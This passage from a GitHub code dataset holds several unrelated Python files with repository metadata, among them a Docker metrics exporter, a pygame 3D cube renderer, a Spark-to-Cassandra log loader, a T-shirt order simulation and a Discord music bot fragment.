GENERAL PELAGIC STATE VARIABLES:\n# # PELAGIC GASES\n# # -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=\n# p2c, z5c, r6c, r1c, n1p, n3n, n4n, o2o = get_initial_conditions()\n#\n# # NEED TO FINISH TRANSLATING MODULEMEM\n#\n#\n#\n#\n# # EOC\n# # -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=\n# # MODEL POM - Princeton Ocean Model\n# # -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=\n","repo_name":"MalikJordan/pyPOM1D-BFM56","sub_path":"pom/initialize_variables.py","file_name":"initialize_variables.py","file_ext":"py","file_size_in_byte":24278,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"2411018264","text":"import logging\n\nfrom telegram import ParseMode\nfrom telegram.ext import CommandHandler\n\nfrom module.modez import mode\n\n\nclass Startup(object):\n def __init__(self):\n self.logger = logging.getLogger(__name__)\n self.mode = mode.Modez()\n\n def start_command(self, bot, update, user_data):\n \"\"\"\n Show the setting page board\n :param bot:\n :param update:\n :param user_data: store the user config info\n :return:\n \"\"\"\n self.mode.show_mode_board(bot, update, user_data)\n\n def help_info(self, bot, update):\n self.logger.debug(\"send help info\")\n # text = \"`我是机器人小玉,我来说明使用方法!\\n\" \\\n # \"::发送关键词搜索并下载音乐\" \\\n # \"::同上。发送歌单链接,以便导入歌单\" \\\n # \"::发送一张动漫截图,获取动漫信息\" \\\n # \"::如果~变成⦿后,就可以回复我呢(否则需要耐心等待哦)。\\n`\"\n text = \"`我是机器人小玉,我来说明使用方法!\\n\" \\\n \"::发送关键词搜索并下载音乐\\n\" \\\n \"::同上。发送歌单链接,以便导入歌单\\n\" \\\n \"::发送一张动漫截图,获取动漫信息\\n`\"\n # \"::如果~变成⦿后,就可以回复我呢(否则需要耐心等待哦)。\\n`\"\n bot.send_message(chat_id=update.message.chat.id, text=text, parse_mode=ParseMode.MARKDOWN)\n\n def handler_startup(self, dispatcher):\n dispatcher.add_handler(CommandHandler(['start', 'mode'], self.start_command, pass_user_data=True))\n dispatcher.add_handler(CommandHandler('help', self.help_info))\n","repo_name":"GoGoogle/TamakosBot","sub_path":"handler/boot.py","file_name":"boot.py","file_ext":"py","file_size_in_byte":1687,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"2362665582","text":"from pygame import Rect\nfrom pygame.color import Color\nimport pygame.image\nimport pygame.transform\nimport pygame.draw\n\nfrom os import path\n\nfrom timez import Time\n\nclass Image:\n\n def __init__ (self, filename, x, y, w, h):\n\n self.filepath = path.join ('images', filename)\n self.x = x\n self.y = y\n self.w = w\n self.h = h\n\n self.rect = Rect (x, y, 
w, h)\n self.dbColor = Color ('#00ff00')\n\n self.original = pygame.image.load (self.filepath).convert_alpha()\n self.surface = pygame.transform.scale (self.original, (self.w, self.h))\n\n def draw (self, win_surface):\n win_surface.blit (self.surface, (self.x, self.y))\n\n def debugDraw (self, win_surface):\n pygame.draw.rect (win_surface, self.dbColor, self.rect)\n self.draw (win_surface)\n\n\n def move (self, dx, dy):\n self.x += dx * Time.dt\n self.y += dy * Time.dt\n self.rect.update (self.x, self.y, self.w, self.h)\n\n def moveTo (self, x, y):\n self.x = x\n self.y = y\n self.rect.update (x, y, self.w, self.h)\n\n def resize (self, w, h):\n self.w = w\n self.h = h\n self.rect.w = w\n self.rect.h = h\n self.surface = pygame.transform.scale (self.original, (w, h))\n\n","repo_name":"CSnackerman/CheezeGame","sub_path":"image.py","file_name":"image.py","file_ext":"py","file_size_in_byte":1275,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"37627408812","text":"import json\nimport logging\nimport os\nfrom concurrent.futures.thread import ThreadPoolExecutor\nfrom pathlib import Path\nfrom typing import Callable\nfrom wsgiref.simple_server import make_server\n\nimport docker\nfrom prometheus_client import make_wsgi_app\nfrom prometheus_client.core import REGISTRY, GaugeMetricFamily\nfrom requests.adapters import HTTPAdapter\n\nlogging.basicConfig()\n\nMAX_POOL_SIZE = 100\n\nhost = os.environ.get(\"HTTP_HOST\", \"\")\nport = int(os.environ.get(\"HTTP_PORT\", 8080))\ndebug = os.environ.get(\"DEBUG\", \"false\").lower() in [\"true\", \"on\", \"y\", \"yes\", \"1\"]\n\n\nlogger = logging.getLogger(Path(__file__).stem)\nif debug:\n logger.setLevel(logging.DEBUG)\n\n\ndocker_client = docker.from_env(max_pool_size=MAX_POOL_SIZE)\n\n# Patch the default HTTPAdapter for docker to use a pool size of MAX_POOL_SIZE\n# Setting max_pool_size in docker.from_env doesn't take effect for HTTP connections\nif (\n \"http://\" in docker_client.api.adapters\n and docker_client.api.adapters[\"http://\"]._pool_maxsize < MAX_POOL_SIZE\n):\n docker_client.api.mount(\"http://\", HTTPAdapter(pool_maxsize=MAX_POOL_SIZE))\n\n\nclass CustomCollector(object):\n def collect(self):\n with ThreadPoolExecutor() as t:\n stats = list(\n t.map(\n lambda c: c.stats(stream=False),\n docker_client.containers.list(),\n )\n )\n\n logger.debug(f\"Stats: {json.dumps(stats)}\")\n\n def gauge_metric(\n name: str,\n documentation: str,\n supplier: Callable[[dict], float],\n ):\n g = GaugeMetricFamily(name, documentation, labels=[\"name\"])\n for stat in stats:\n g.add_metric([stat[\"name\"].lstrip(\"/\")], supplier(stat))\n return g\n\n yield gauge_metric(\n \"container_cpu_usage_total\",\n \"Total CPU time consumed\",\n lambda s: s[\"cpu_stats\"][\"cpu_usage\"][\"total_usage\"],\n )\n yield gauge_metric(\n \"container_cpu_usage_kernel\",\n \"Time spent by tasks of the cgroup in kernel mode\",\n lambda s: s[\"cpu_stats\"][\"cpu_usage\"][\"usage_in_kernelmode\"],\n )\n yield gauge_metric(\n \"container_cpu_usage_user\",\n \"Time spent by tasks of the cgroup in user mode\",\n lambda s: s[\"cpu_stats\"][\"cpu_usage\"][\"usage_in_usermode\"],\n )\n yield gauge_metric(\n \"container_cpu_usage_system\",\n \"System Usage\",\n lambda s: s[\"cpu_stats\"][\"system_cpu_usage\"],\n )\n yield gauge_metric(\n \"container_mem_usage\",\n \"Total memory usage for container\",\n lambda s: s[\"memory_stats\"][\"usage\"],\n )
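\n # Editorial note (not in the original source): each gauge_metric(...) call\n # materializes one Prometheus metric family, rendered in the exposition\n # format roughly as, e.g. (hypothetical container name):\n # container_mem_usage{name=\"web\"} 1.23e+08\n yield gauge_metric(\n \"container_mem_limit\",\n \"Memory usage limit for 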
container\",\n lambda s: s[\"memory_stats\"][\"limit\"],\n )\n yield gauge_metric(\n \"container_io_read_total\",\n \"Total IO read by the container\",\n lambda s: sum(\n [\n io[\"value\"]\n for io in s[\"blkio_stats\"][\"io_service_bytes_recursive\"] or []\n if io[\"op\"] == \"read\"\n ]\n ),\n )\n yield gauge_metric(\n \"container_io_write_total\",\n \"Total IO written by the container\",\n lambda s: sum(\n [\n io[\"value\"]\n for io in s[\"blkio_stats\"][\"io_service_bytes_recursive\"] or []\n if io[\"op\"] == \"write\"\n ]\n ),\n )\n\n network_metrics = {\n key\n for stat in stats\n for network in stat.get(\"networks\", {}).values()\n for key in network.keys()\n }\n for network_metric in network_metrics:\n g = GaugeMetricFamily(\n f\"container_net_{network_metric}\",\n f\"Network metric {network_metric}\",\n labels=[\"name\", \"network\"],\n )\n for stat in stats:\n for network_name, network in stat.get(\"networks\", {}).items():\n g.add_metric(\n [stat[\"name\"].lstrip(\"/\"), network_name],\n network[network_metric],\n )\n yield g\n\n\nREGISTRY.register(CustomCollector())\n\napp = make_wsgi_app()\nhttpd = make_server(host, port, app)\n\nprint(f\"Started server: http://localhost:{port}\")\nhttpd.serve_forever()\n","repo_name":"dgootman/docker-exporter","sub_path":"docker_exporter.py","file_name":"docker_exporter.py","file_ext":"py","file_size_in_byte":4517,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"35071134166","text":"from django import template\nfrom blogging.models import Category, Feedback, Post\n\n\nregister = template.Library()\n\n\n@register.inclusion_tag('blogging/list_categories.html')\ndef show_categories(sort=None, cat_selected=0):\n if not sort:\n cats = Category.objects.all()\n else:\n cats = Category.objects.order_by(sort)\n\n return {'cats': cats, 'cat_selected': cat_selected}\n\n\n@register.simple_tag()\ndef get_feedback():\n return Post.objects.get(id=2).feedbacks.all()\n","repo_name":"Gaidysheff/BILLBOARD","sub_path":"BillBoard/blogging/templatetags/blogging_tags.py","file_name":"blogging_tags.py","file_ext":"py","file_size_in_byte":484,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"14926202982","text":"from worldgen import WorldGen\nfrom entities.player import Player\nfrom entities.zombie import Zombie\nfrom math import ceil\nfrom random import randint, random, choice\nfrom timer import Cooldown, Stopwatch\n\n\nclass Server:\n def __init__(self, state):\n self.state = state\n self.entities = []\n self.tilemap = {}\n self.ticker_tiles = {}\n self.worldgen = WorldGen(self.tilemap, self)\n self.worldgen.start()\n self.monster_time_scale = 1\n self.mob_cap = 10\n self.monster_cooldown = Cooldown(60 * 5 * self.monster_time_scale)\n self.age = Stopwatch()\n\n def get_world_spawn(self):\n x = randint(-10, 10)\n y = self.get_highest(x)\n return (x, y)\n\n def spawn(self, entity_type, x):\n same_type = len([\n entity\n for entity in self.entities\n if isinstance(entity, entity_type)\n ])\n if same_type < self.mob_cap:\n y = self.get_highest(x)\n entity = entity_type(self, (x, y))\n self.entities.append(entity)\n return entity, True\n\n def get_tile(self, pos):\n if pos not in self.tilemap:\n self.worldgen.generate(pos)\n return self.tilemap[pos]\n\n def get_highest(self, x, stop_clip=True):\n y = -15\n while True:\n if (x, y) in self.tilemap:\n y -= 1\n else:\n break\n tile = self.get_tile((x, y))\n while tile and tile.COLLISION:\n y += 1\n tile 
= self.get_tile((x, y))\n # parentheses matter here: stop_clip should only toggle the small\n # anti-clip offset, not replace the whole height with 0\n return y + (0.01 if stop_clip else 0)\n\n def set_tile(self, pos, tile):\n if tile and tile.TICKER:\n self.ticker_tiles[pos] = tile\n elif pos in self.tilemap: # Check the old tile\n old_tile = self.tilemap[pos]\n if old_tile and old_tile.TICKER:\n del self.ticker_tiles[pos]\n self.tilemap[pos] = tile\n\n def tick(self):\n self.monsters()\n to_delete = []\n for entity in self.entities:\n if entity.enabled:\n entity.tick()\n if entity.destroyed:\n to_delete.append(entity)\n for entity in to_delete:\n self.entities.remove(entity)\n for pos, tile in list(self.ticker_tiles.items()):\n tile.tick(pos, self)\n\n def monsters(self):\n if self.monster_cooldown.expired():\n self.monster_cooldown.start(\n (60 + (random() - 0.5) * 30) * self.monster_time_scale\n )\n monster_num = ceil(self.age.time() / (60 * 10) * random())\n for i in range(monster_num):\n player = [\n entity\n for entity in self.entities\n if isinstance(entity, Player)\n ]\n if player:\n x_pos = choice(player).x + choice([-30, 30])\n self.spawn(choice([Zombie]), x_pos)\n\n def collides(self, pos):\n x, y = pos\n return self.get_tile((round(x), round(y)))\n\n def entities_at(self, pos):\n return [\n entity\n for entity in self.entities\n if entity.collides(pos)\n ]\n\n def is_full(self, pos):\n return self.collides(pos) or len(self.entities_at(pos))\n","repo_name":"budopod1/backend-a3","sub_path":"server.py","file_name":"server.py","file_ext":"py","file_size_in_byte":3312,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"11068019303","text":"import pygame\nimport pandas as pd\nimport numpy as np\npygame.init()\n\n#screen dimensions\nscreen_width = 1200\nscreen_height = 600\n\n#colors\nbak_color = (76, 217, 191)\nyellow = (255, 255, 0)\nblue = (87, 233, 248)\ngreen = (30, 180, 30)\nred = (200,0,0)\nblack = (0,0,0)\n\n#shapes\ndef stationary_cube(xyz, whl):\n cube = [[0,0,0],[0,0,0],[0,0,0],[0,0,0],[0,0,0],[0,0,0],[0,0,0],[0,0,0]]\n x1 = xyz[0] - whl[0]/2\n x2 = xyz[0] + whl[0]/2\n y1 = xyz[1] - whl[1]/2\n y2 = xyz[1] + whl[1]/2\n z1 = xyz[2] - whl[2]/2\n z2 = xyz[2] + whl[2]/2\n top = list(range(4))\n bot = list(range(4,8))\n side1 = top[0:2] + [bot[1], bot[0]]\n side2 = top[1:3] + [bot[2], bot[1]]\n side3 = top[2:4] + [bot[3], bot[2]]\n side4 = [top[0], top[3], bot[3], bot[0]]\n \n for i in top:\n cube[i][1] = y1\n for i in bot:\n cube[i][1] = y2\n for i in side1:\n cube[i][0] = x1\n for i in side3:\n cube[i][0] = x2\n for i in side2:\n cube[i][2] = z1\n for i in side4:\n cube[i][2] = z2\n\n side_groups = top, bot, side1, side2, side3, side4\n\n return cube, side_groups #,tops, bots, sides1, sides2, sides3, sides4\n\n#functions\ndef ang_dist(x1, y1, x2, y2, ang):\n distx = x2 - x1\n disty = y2 - y1\n dist = (distx**2 + disty**2)**0.5\n\n if distx > 0:\n cube_ang = np.arcsin(disty/dist)\n else:\n if disty > 0:\n cube_ang = np.pi - np.arcsin(disty/dist)\n else:\n cube_ang = -np.pi/2 -(np.pi/2 + np.arcsin(disty/dist))\n\n if ang <= 0:\n ang = 2*np.pi - np.absolute(ang)%(2*np.pi)\n elif ang >= 2*np.pi:\n ang = 2*np.pi - ang%(2*np.pi)\n\n dif_ang = cube_ang - ang\n\n if dif_ang < -np.pi:\n dif_ang = 2*np.pi + dif_ang\n elif dif_ang > np.pi:\n dif_ang = dif_ang - 2*np.pi\n \n return dist, cube_ang, dif_ang
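\n\n# Editorial worked example (not in the original): ang_dist returns the\n# distance, the target's absolute angle, and the difference from the view\n# angle wrapped into [-pi, pi], e.g.\n# ang_dist(0, 0, 1, 1, 0) # -> (1.414..., pi/4, pi/4)\n\ndef da_to_xy(dif_ang_x, dif_ang_y, view_width, view_height):\n corners = []\n #find position x\n ang_ratio = dif_ang_x/(view_width/2)\n \n ang_ratioy = dif_ang_y/(view_height/2)\n x = screen_width/2 - ang_ratio*screen_width/2\n y = screen_height/2 - 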
ang_ratioy*screen_height/2\n\n return (x,y)\n \n\n#classes\nclass cube:\n whl = (100, 200, 300)\n xyz = [200, whl[1]/2, 600]\n ang_xzr = (0, 0, 0)\n colors = (red, blue, green, blue, green, red)\n\n def draw(self, cam_xyz, cam_angs_xy, view_angs):\n #find corner points IN:(whl, xyz, ang_xzr), OUT:(corners_xyz, side_groups)\n corners_xyz, side_groups = stationary_cube(self.xyz, self.whl)\n\n #sort into polys IN:(corners_xyz, side_groups) OUT:(poly_xyz, side_num)\n poly_xy = []\n poly_ad = []\n side_num = list(range(len(side_groups)))\n for i in side_groups:\n poly_xy.append([])\n poly_ad.append(0)\n count = 0\n for n in i:\n count += 1\n #find dist and ang IN:(poly_xyz) OUT:(poly_da)\n dist_xz, cube_ang_x, dif_ang_x = ang_dist(cam_xyz[0], cam_xyz[2], corners_xyz[n][0], corners_xyz[n][2], cam_angs_xy[0])\n dist, cube_ang, dif_ang = ang_dist(0, cam_xyz[1], dist_xz, corners_xyz[n][1], cam_angs_xy[1])\n\n #convert 3d to 2d IN:(poly_da) OUT:(poly_xy)\n xy = da_to_xy(dif_ang, dif_ang_x, view_angs[0], view_angs[1])\n\n #add the distances\n poly_ad[-1] += dist\n\n #append\n poly_xy[-1].append(xy)\n \n #average the distances\n poly_ad[-1] = poly_ad[-1]/count\n\n #sort cubes by dist large to small IN:(poly_xy, poly_ad, side_num) OUT:(flat_cube, cube_avg_dist, side_num)\n sorted_ad = sorted(poly_ad)\n flat_cube = []\n avg_dist = sum(poly_ad)/len(poly_ad)\n\n count = 0\n while sum(poly_ad) != 0:\n for i in range(len(poly_ad)):\n if poly_ad[i] == sorted_ad[count]:\n flat_cube.append(poly_xy[i])\n side_num[count] = i\n poly_ad[i] = 0\n count += 1\n \n return flat_cube, avg_dist, side_num\n\n#scene facts\n#camera atributes\ncamera_xyz = [200,100,100]\ncamera_angs_xy = [0,0]\ncam_speed = 20\ncamera_view_angles = [np.pi/3, np.pi/3]\n\n\n#create objects\npolygons = []\ndistances = []\nside_numbers = []\ncubes = []\nfor i in range(2):\n cubes.append(cube())\n\n#create display\npygame.display.set_caption('cubes')\ndisplay = pygame.display.set_mode((screen_width, screen_height))\n\n#main\nrun = True\nwhile run:\n #delay and screen reset\n pygame.time.delay(60)\n display.fill(bak_color)\n\n #find polygon info\n for i in range(len(cubes)):\n polys_xy, avg_dist, side_nums = cubes[i].draw(camera_xyz, camera_angs_xy, camera_view_angles)\n polygons.append(polys_xy)\n distances.append(avg_dist)\n side_numbers.append(side_nums)\n \n #sort polygons by distance\n sorted_dist = sorted(distances)\n polys = []\n side_ident = []\n count = 0\n while sum(distances) != 0:\n for i in range(len(distances)):\n if distances[i] == sorted_dist[count]:\n polys.append(polygons[i])\n side_ident.append(side_numbers[i])\n distances[i] = 0\n count += 1\n\n #draw polygons\n for i in range(len(polygons)):\n for n in range(len(polygons[i])):\n #color = cubes[i].colors[side_ident[i][n]]\n pygame.draw.polygon(display, blue, polys[i][n])\n \n #get key press inputs\n keys = pygame.key.get_pressed()\n\n #mouse movement\n mouse = pygame.mouse.get_pos()\n mouse_dif = (mouse[0]-screen_width/2, mouse[1]-screen_height/2)\n\n camera_angs_xy[0] -= mouse_dif[0]/(screen_width*3)\n\n #walk around\n if keys[pygame.K_w]:\n camera_xyz[0] += np.cos(camera_angs_xy[0])*cam_speed\n camera_xyz[1] += np.sin(camera_angs_xy[0])*cam_speed\n elif keys[pygame.K_s]:\n camera_xyz[0] += np.cos(camera_angs_xy[0]+np.pi)*cam_speed\n camera_xyz[1] += np.sin(camera_angs_xy[0]+np.pi)*cam_speed\n if keys[pygame.K_a]:\n camera_xyz[0] += np.cos(camera_angs_xy[0]+np.pi/2)*cam_speed\n camera_xyz[1] += np.sin(camera_angs_xy[0]+np.pi/2)*cam_speed\n elif keys[pygame.K_d]:\n camera_xyz[0] 
+= np.cos(camera_angs_xy[0]-np.pi/2)*cam_speed\n camera_xyz[1] += np.sin(camera_angs_xy[0]-np.pi/2)*cam_speed\n\n #update screen\n pygame.display.update()\n\n #quit properly\n for event in pygame.event.get() : \n if event.type == pygame.QUIT :\n pygame.quit() \n run = False","repo_name":"wrafaelharr/Python_projects","sub_path":"3D environment/perspective_cube_v5.py","file_name":"perspective_cube_v5.py","file_ext":"py","file_size_in_byte":6555,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"23760448053","text":"import csv\n\nfileName = \"demo.csv\"\nREAD = \"r\"\n\nwith open(fileName, READ) as myCsvFile :\n #Read the file content\n dataFromFile = csv.reader(myCsvFile)\n for dataRow in dataFromFile :\n print(', '.join(dataRow))\n for singleRow in dataRow :\n print(singleRow)","repo_name":"okhachiai/Personal_Labs","sub_path":"PythonLab/LearnPython/readFromCsvFile.py","file_name":"readFromCsvFile.py","file_ext":"py","file_size_in_byte":286,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"14077376175","text":"#! /usr/bin/env python3\n\n\nimport argparse\nimport collections\nimport datetime\nimport pickle\nimport warnings\n\nimport numpy as np\nimport openpyxl\n\nORDER_SIZE = 35\nPSEUDOCOUNT = 35\n\nSIM_SIZE = 10_000\n\n# openpyxl does not support data validation, which does not affect the work\n# here\nwarnings.simplefilter('ignore', UserWarning)\n\n# Initialize NumPy random number generator\ngen = np.random.default_rng(seed=42)\n\nparser = argparse.ArgumentParser(\n description='Compute an optimal T-shirt order.')\nparser.add_argument('inventory_filename',\n help='filename of Excel spreadsheet with inventory')\nparser.add_argument('-m', '--method',\n choices=['worst_case', 'industry', 'heuristic', 'optimized'],\n default='heuristic',\n help='how to compute the optimal order')\nparser.add_argument('-o', '--output',\n choices=['console', 'hypothetical', 'final'], default='console',\n help='where to write down the optimal order')\nargs = parser.parse_args()\n\n# Grab counts of lifetime T-shirts received and lifetime T-shirts queued from\n# the inventory spreadsheet\nwb = openpyxl.load_workbook(filename=args.inventory_filename, data_only=True)\nassert wb['inventory']['A2'].value == 'Lifetime received'\nassert wb['inventory']['A3'].value == 'Lifetime queued'\n\nlifetime_received = collections.OrderedDict()\nlifetime_queued = collections.OrderedDict()\nlogical_inventory = collections.OrderedDict() # Negatives denote backorders\ngendered_sizes = []\n\nfor column in wb['inventory'].iter_cols():\n header_val = column[0].value\n if header_val is not None and header_val != 'totals':\n lifetime_received[header_val] = column[1].value\n lifetime_queued[header_val] = column[2].value\n logical_inventory[header_val] = column[6].value\n gendered_sizes.append(header_val)\nwb.close()\n\n# We define a weakly informative Dirichlet prior from industry knowledge:\nindustry_knowledge = {'XS': 0.01,\n 'S': 0.07,\n 'M': 0.28,\n 'L': 0.30,\n 'XL': 0.20,\n '2XL': 0.12,\n '3XL': 0.02}
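\n\n# Editorial sanity check (not in the original source): the industry-knowledge\n# histogram is a probability vector, e.g.\n# assert abs(sum(industry_knowledge.values()) - 1.0) < 1e-9\n\n# A bit of tidying to deal with the real world: the vendor does not sell\n# women's XS or 3XL shirts. There are a couple reasonable, arbitrary ways to\n# deal with this in conjunction with a 50:50 prior distribution of men vs\n# women. One would be to allocate the other sizes evenly between men and women,\n# allocating all 1% of XS and all 2% of 3XL to men. 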
Another would be to\n# re-normalize the distribution of women's shirts, such that (e.g.) 0.07 / (1 -\n# 0.01 - 0.02) of women's shirts are size WS. Note these are very close.\n#\n# Doing the first thing, which makes the prior histogram 51.5% men and 48.5%\n# women:\nprior_size_hist = collections.OrderedDict()\nfor gendered_size in gendered_sizes:\n size = gendered_size[1:]\n if f'M{size}' in lifetime_received and \\\n f'W{size}' in lifetime_received:\n prior_size_hist[gendered_size] = industry_knowledge[size] / 2.0\n else:\n prior_size_hist[gendered_size] = industry_knowledge[size]\n\nalpha_prior = np.array([1.0 + PSEUDOCOUNT * val\n for val in prior_size_hist.values()])\n\nprior_samples = gen.dirichlet(alpha_prior, size=SIM_SIZE)\n\n# Diagnostic for choosing a reasonable pseudocount for the prior: How many MXS\n# shirts were ordered? 1% of 35 shirts is 0.35 shirts on average. Ordering more\n# than 3 of these, a priori, should happen pretty seldom.\n#\n# mxs_probs = prior_samples[:, 0]\n# more_than_three = sum(gen.binomial(ORDER_SIZE, prob) > 3 for prob in mxs_probs)\n# print(more_than_three / SIM_SIZE)\n#\n# Some prior predictive simulation results:\n# PSEUDOCOUNT = 0 => 32% of orders have >3 MXS shirts\n# PSEUDOCOUNT = 20 => 9.2% of orders have >3 MXS shirts\n# PSEUDOCOUNT = 35 => 5.0% of orders have >3 MXS shirts\n# PSEUDOCOUNT = 50 => 3.3% of orders have >3 MXS shirts\n#\n# From this, PSEUDOCOUNT = 35 seems pretty reasonable: flexible enough to allow\n# for startlingly lopsided orders, but not flexible enough that they happen all\n# the time.\n\n# Construct posterior from lifetime queued\ncounts = np.array(list(lifetime_queued.values()))\nalpha_posterior = alpha_prior + counts\n\n# Now sample distributions from the posterior:\nposterior_samples = gen.dirichlet(alpha_posterior, size=SIM_SIZE)\n\n# At most we'd need to simulate logical_inventory + ORDER_SIZE samples from\n# each draw of the Dirichlet distribution (i.e., one could never do better than\n# perfect efficiency where you fill existing backorders, then use every single\n# T-shirt already in stock and every T-shirt in the order we're planning here,\n# getting to a completely empty inventory before the following re-order).\ninv_arr = np.array(list(logical_inventory.values()))\n\n# Build the library of order streams.\nstream_length = sum(inv_arr) + ORDER_SIZE\norder_streams = np.zeros((posterior_samples.shape[0], stream_length),\n dtype='int')\nfor i in range(order_streams.shape[0]):\n order_streams[i, :] = gen.choice(inv_arr.shape[0],\n size=stream_length,\n p=posterior_samples[i])\n\n# Hack: dump order streams to disk and that's it.\nwith open('order_streams.pkl', 'wb') as pf:\n pickle.dump(order_streams, pf)\n","repo_name":"ramanshahdatascience/tshirts","sub_path":"2023-02-23-talk/time_to_order_histograms/build_order.py","file_name":"build_order.py","file_ext":"py","file_size_in_byte":5188,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"40"} +{"seq_id":"37059420761","text":"from humps import camelize\nfrom pydantic import BaseModel, Field\n\nfrom app.types import ULID\n\n\nclass APIModel(BaseModel):\n class Config:\n orm_mode = True\n alias_generator = camelize\n allow_population_by_field_name = True\n\n\nclass AbstractBaseModel(APIModel):\n id: ULID = Field(...)\n\n\nclass AbstractParentResourceModel(AbstractBaseModel):\n file_id: str = Field(..., title=\"SHA256\", alias=\"sha256\")\n\n\nclass AbstractResourceModel(APIModel):\n id: str = Field(..., title=\"ID\", description=\"A 
SHA256 hash of the content\")\n content: str = Field(...)\n","repo_name":"ninoseki/uzen","sub_path":"app/schemas/base.py","file_name":"base.py","file_ext":"py","file_size_in_byte":578,"program_lang":"python","lang":"en","doc_type":"code","stars":89,"dataset":"github-code","pt":"40"} +{"seq_id":"28802261326","text":"from objs.microService import MicroService\n\n\nclass Gcp_general_jobs(MicroService):\n def __init__(self, service_name, namespace):\n super().__init__(service_name, namespace)\n self.replicaCount = None if namespace == \"prod\" else 1\n\n def set_resources(self):\n self.namespace == \"prod\" or self.resources.update({\n \"requests\": {\n \"cpu\": \"1000m\",\n \"memory\": \"1000Mi\",\n },\n \"limits\": {\n \"cpu\": \"1000m\",\n \"memory\": \"1000Mi\",\n }\n })\n\n def set_envs(self):\n self.env.update({\n \"SPRING_PROFILES_ACTIVE\": \"prod\" if \"prod\" == self.namespace else \"test\",\n \"JVM_HEAP_MIN\": \"350M\" if \"prod\" == self.namespace else \"150M\",\n \"JVM_HEAP_MAX\": \"700M\" if \"prod\" == self.namespace else \"300M\",\n })\n\n # Overriding the default method\n def populate_ingress(self, sub_domain):\n hosts = [f'{self.serviceName}{\"-dev\" if self.namespace != \"prod\" else \"\"}.{domain}' for domain in self.domains]\n hosts.extend([f'{self.serviceName}.{sub_domain}.{domain}' for domain in self.domains])\n tls = [{'secreteName': self.tlsSecrets[self.extract_domain(host)], 'hosts': [host]} for host in\n list(filter(lambda host: \"k8s\" not in host, hosts))]\n\n return {'hosts': hosts, 'tls': tls}\n","repo_name":"EranM6/umbrella-server","sub_path":"apps/gcp-general-jobs.py","file_name":"gcp-general-jobs.py","file_ext":"py","file_size_in_byte":1374,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"37575704390","text":"from pyspark.sql import SparkSession, types\nfrom cassandra.cluster import Cluster\nimport sys, re, uuid\n\nassert sys.version_info >= (3, 5) # make sure we have Python 3.5+\n\ndef parse_line(input):\n line_re = re.compile(r'^(\\S+) - - \\[(\\S+) [+-]\\d+\\] \\\"[A-Z]+ (\\S+) HTTP/\\d\\.\\d\\\" \\d+ (\\d+)$')\n line = line_re.split(input)\n if len(line) > 4:\n host = line[1]\n path = line[3]\n bytes = int(line[4])\n id = str(uuid.uuid4())\n return host, path, bytes, id\n\ndef main(input, output_kys, nasalogs):\n\n data = sc.textFile(input).repartition(100)\n re_data = data.map(parse_line).filter(lambda x: x is not None) #filter out the None tuples\n nasa_schema = types.StructType([\n types.StructField('host', types.StringType()),\n types.StructField('path', types.StringType()),\n types.StructField('bytes', types.IntegerType()),\n types.StructField('id', types.StringType())\n ])\n df = spark.createDataFrame(re_data, schema = nasa_schema)\n df.show(5)\n df.write.format(\"org.apache.spark.sql.cassandra\").mode('overwrite').option('confirm.truncate','true') \\\n .options(table = nasalogs, keyspace = output_kys).save()\n\nif __name__ == \"__main__\":\n cluster_seeds = ['node1.local', 'node2.local']\n spark = SparkSession.builder.appName('load logs spark') \\\n .config('spark.cassandra.connection.host',','.join(cluster_seeds)).getOrCreate()\n assert spark.version >= '3.0' # make sure we have Spark 3.0+\n spark.sparkContext.setLogLevel('WARN')\n sc = spark.sparkContext\n\n input = sys.argv[1]\n output_kys = sys.argv[2]\n table = sys.argv[3]\n main(input, output_kys, table)\n 
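# Editorial example (hypothetical Apache-style log line, not from the repo):\n# parse_line('in24.inetnebr.com - - [01/Aug/1995:00:00:01 -0400] \"GET /x.txt HTTP/1.0\" 200 1839')\n# -> ('in24.inetnebr.com', '/x.txt', 1839, '<random uuid4 string>')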
\n\n","repo_name":"xxxibdara/Big_Data_Works_732","sub_path":"A8/load_logs_spark.py","file_name":"load_logs_spark.py","file_ext":"py","file_size_in_byte":1678,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"14754594368","text":"import subprocess\nfrom typing import Any, Dict, Optional\nfrom discord.opus import Encoder\nimport io\nimport shlex\nimport asyncio\nfrom src.res.errors.bad_link import BadLink\nimport discord\nimport yt_dlp as youtube_dl\nfrom requests import get\n\nfrom ..interfaces.imusicdata import IMusicData\n\nyoutube_dl.utils.bug_reports_message = lambda: \"\"\n\nytdl_format_options = {\n \"format\": \"bestaudio/best\",\n \"outtmpl\": \"%(extractor)s-%(id)s-%(title)s.%(ext)s\",\n \"restrictfilenames\": True,\n \"noplaylist\": False,\n \"extract_flat\": True,\n \"nocheckcertificate\": True,\n \"ignoreerrors\": True,\n \"logtostderr\": False,\n \"quiet\": True,\n \"no_warnings\": True,\n \"default_search\": \"auto\",\n \"source_address\": \"0.0.0.0\",\n}\n\nffmpeg_options: Dict[str, Any] = {\n \"options\": \"-vn\",\n 